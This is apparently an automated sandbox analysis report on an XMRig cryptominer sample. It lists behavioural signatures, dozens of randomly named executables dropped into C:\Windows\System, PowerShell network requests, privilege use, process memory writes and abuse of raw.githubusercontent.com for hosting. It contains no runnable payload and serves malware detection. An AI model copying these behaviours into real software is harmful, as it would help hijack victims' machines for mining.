Malware Analysis Report

2025-04-19 18:42

Sample ID 240527-dcs2ysdg21
Target 77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118
SHA256 f0e7ed3d803ad9e95734463cfcd93eed6d23776915a7a322d2f9b48d1b188901
Tags
xmrig execution miner upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f0e7ed3d803ad9e95734463cfcd93eed6d23776915a7a322d2f9b48d1b188901

Threat Level: Known bad

The file 77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

xmrig execution miner upx

xmrig

XMRig Miner payload

Xmrig family

XMRig Miner payload

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

UPX packed file

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Modifies data under HKEY_USERS

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Checks SCSI registry key(s)

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-27 02:52

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-27 02:52

Reported

2024-05-27 02:54

Platform

win10v2004-20240426-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\EMahSjJ.exe N/A
N/A N/A C:\Windows\System\aKCAmlY.exe N/A
N/A N/A C:\Windows\System\xbMKovq.exe N/A
N/A N/A C:\Windows\System\gKHEctz.exe N/A
N/A N/A C:\Windows\System\hOglZUz.exe N/A
N/A N/A C:\Windows\System\ceKlYdH.exe N/A
N/A N/A C:\Windows\System\ejgmYJX.exe N/A
N/A N/A C:\Windows\System\xkCSZOf.exe N/A
N/A N/A C:\Windows\System\tkQTMyN.exe N/A
N/A N/A C:\Windows\System\TjMFNtQ.exe N/A
N/A N/A C:\Windows\System\rkHvnyk.exe N/A
N/A N/A C:\Windows\System\etHMQHe.exe N/A
N/A N/A C:\Windows\System\oiisWpg.exe N/A
N/A N/A C:\Windows\System\yZyyZDP.exe N/A
N/A N/A C:\Windows\System\GEDVfiV.exe N/A
N/A N/A C:\Windows\System\lQfWRnx.exe N/A
N/A N/A C:\Windows\System\wlywQfv.exe N/A
N/A N/A C:\Windows\System\OlHuPyU.exe N/A
N/A N/A C:\Windows\System\RPbpAHo.exe N/A
N/A N/A C:\Windows\System\JiMyCQR.exe N/A
N/A N/A C:\Windows\System\leiGMuT.exe N/A
N/A N/A C:\Windows\System\GfvluYu.exe N/A
N/A N/A C:\Windows\System\doPYruV.exe N/A
N/A N/A C:\Windows\System\byeZGtM.exe N/A
N/A N/A C:\Windows\System\cjxDRxy.exe N/A
N/A N/A C:\Windows\System\JyTPThp.exe N/A
N/A N/A C:\Windows\System\GTfcnns.exe N/A
N/A N/A C:\Windows\System\uSSfEKc.exe N/A
N/A N/A C:\Windows\System\nESehyC.exe N/A
N/A N/A C:\Windows\System\Jrpfcwr.exe N/A
N/A N/A C:\Windows\System\GgfoxTr.exe N/A
N/A N/A C:\Windows\System\ayYTYGq.exe N/A
N/A N/A C:\Windows\System\dZKOjjO.exe N/A
N/A N/A C:\Windows\System\hmWwugt.exe N/A
N/A N/A C:\Windows\System\YpUfwYV.exe N/A
N/A N/A C:\Windows\System\CBkSwBb.exe N/A
N/A N/A C:\Windows\System\MPktnKL.exe N/A
N/A N/A C:\Windows\System\vJcMENp.exe N/A
N/A N/A C:\Windows\System\UHCwsUg.exe N/A
N/A N/A C:\Windows\System\qAwDEqF.exe N/A
N/A N/A C:\Windows\System\RpeIKTw.exe N/A
N/A N/A C:\Windows\System\yAzWmCz.exe N/A
N/A N/A C:\Windows\System\jyEfBKJ.exe N/A
N/A N/A C:\Windows\System\pMPWUts.exe N/A
N/A N/A C:\Windows\System\BXPCoQF.exe N/A
N/A N/A C:\Windows\System\TlAaskP.exe N/A
N/A N/A C:\Windows\System\cQSqvKn.exe N/A
N/A N/A C:\Windows\System\qVWIfQX.exe N/A
N/A N/A C:\Windows\System\tyymIMt.exe N/A
N/A N/A C:\Windows\System\LiDkwVM.exe N/A
N/A N/A C:\Windows\System\QvgAhUS.exe N/A
N/A N/A C:\Windows\System\ueSKkqQ.exe N/A
N/A N/A C:\Windows\System\WwoZQPz.exe N/A
N/A N/A C:\Windows\System\fqPuqam.exe N/A
N/A N/A C:\Windows\System\YDlUKhy.exe N/A
N/A N/A C:\Windows\System\CTMsuQj.exe N/A
N/A N/A C:\Windows\System\CvcaOUC.exe N/A
N/A N/A C:\Windows\System\MmctVjF.exe N/A
N/A N/A C:\Windows\System\jzlsqWr.exe N/A
N/A N/A C:\Windows\System\otjnWOw.exe N/A
N/A N/A C:\Windows\System\sAdwKWF.exe N/A
N/A N/A C:\Windows\System\pflqtkN.exe N/A
N/A N/A C:\Windows\System\BFNeIVY.exe N/A
N/A N/A C:\Windows\System\eVPTUoA.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\RrFBCkP.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\QfDcEVV.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\gqfcqLO.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\neDxTSY.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\FcdvQBL.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\ftAUcgP.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\ScEVeMn.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\nrHpMKU.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\aDZnotY.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\ACKkkWS.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\glPDaDV.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\lMAkqsA.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\sdqCpbi.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\kMgIqQa.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\kdIIopY.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\fXlbmfE.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\MewJcPN.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\tGdIbVi.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\UOcpRNn.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\DHSNzDf.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\wnYbXDY.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\NpfHhuI.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\Yaakzyv.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\LiTndeH.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\YDMnDBA.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\ZAdaIeo.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\xjBXgrt.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\KMaeXvt.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\uxQKZmP.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\tdjTcXv.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\tJJcDQL.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\spudzPn.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\iCZajfA.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\MaBirzo.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\pGlEvhn.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\aGYeBOJ.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\AdwDhpN.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\XwQhLbL.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\ffaisfV.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\KJvyYON.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\uXhVOBt.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\sTweAoA.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\jzjcshd.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\IOpZSPa.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\WkMYaGv.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\PDzhyjR.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\pBOcugs.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\uNNqMiB.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\jCBdCUL.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\OgPcgNf.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\qReeFHr.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\vvKTRCf.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\sddPTpi.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\IZlivah.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\IZyHXyO.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\ZmllvAG.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\kkGlkin.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\kpaTrvq.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\LwXgzAr.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\ctxygfs.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\LLMXbMG.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\EnvbppI.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\aTwgFrG.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
File created C:\Windows\System\pYNwHGa.exe C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID C:\Windows\system32\dwm.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\dwm.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: 33 N/A C:\Windows\system32\dwm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: 33 N/A C:\Windows\system32\dwm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\dwm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3428 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3428 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3428 wrote to memory of 4792 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\EMahSjJ.exe
PID 3428 wrote to memory of 4792 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\EMahSjJ.exe
PID 3428 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\aKCAmlY.exe
PID 3428 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\aKCAmlY.exe
PID 3428 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\xbMKovq.exe
PID 3428 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\xbMKovq.exe
PID 3428 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\gKHEctz.exe
PID 3428 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\gKHEctz.exe
PID 3428 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\hOglZUz.exe
PID 3428 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\hOglZUz.exe
PID 3428 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\rkHvnyk.exe
PID 3428 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\rkHvnyk.exe
PID 3428 wrote to memory of 4716 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\ceKlYdH.exe
PID 3428 wrote to memory of 4716 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\ceKlYdH.exe
PID 3428 wrote to memory of 3088 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\ejgmYJX.exe
PID 3428 wrote to memory of 3088 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\ejgmYJX.exe
PID 3428 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\xkCSZOf.exe
PID 3428 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\xkCSZOf.exe
PID 3428 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\tkQTMyN.exe
PID 3428 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\tkQTMyN.exe
PID 3428 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\TjMFNtQ.exe
PID 3428 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\TjMFNtQ.exe
PID 3428 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\etHMQHe.exe
PID 3428 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\etHMQHe.exe
PID 3428 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\oiisWpg.exe
PID 3428 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\oiisWpg.exe
PID 3428 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\yZyyZDP.exe
PID 3428 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe C:\Windows\System\yZyyZDP.exe
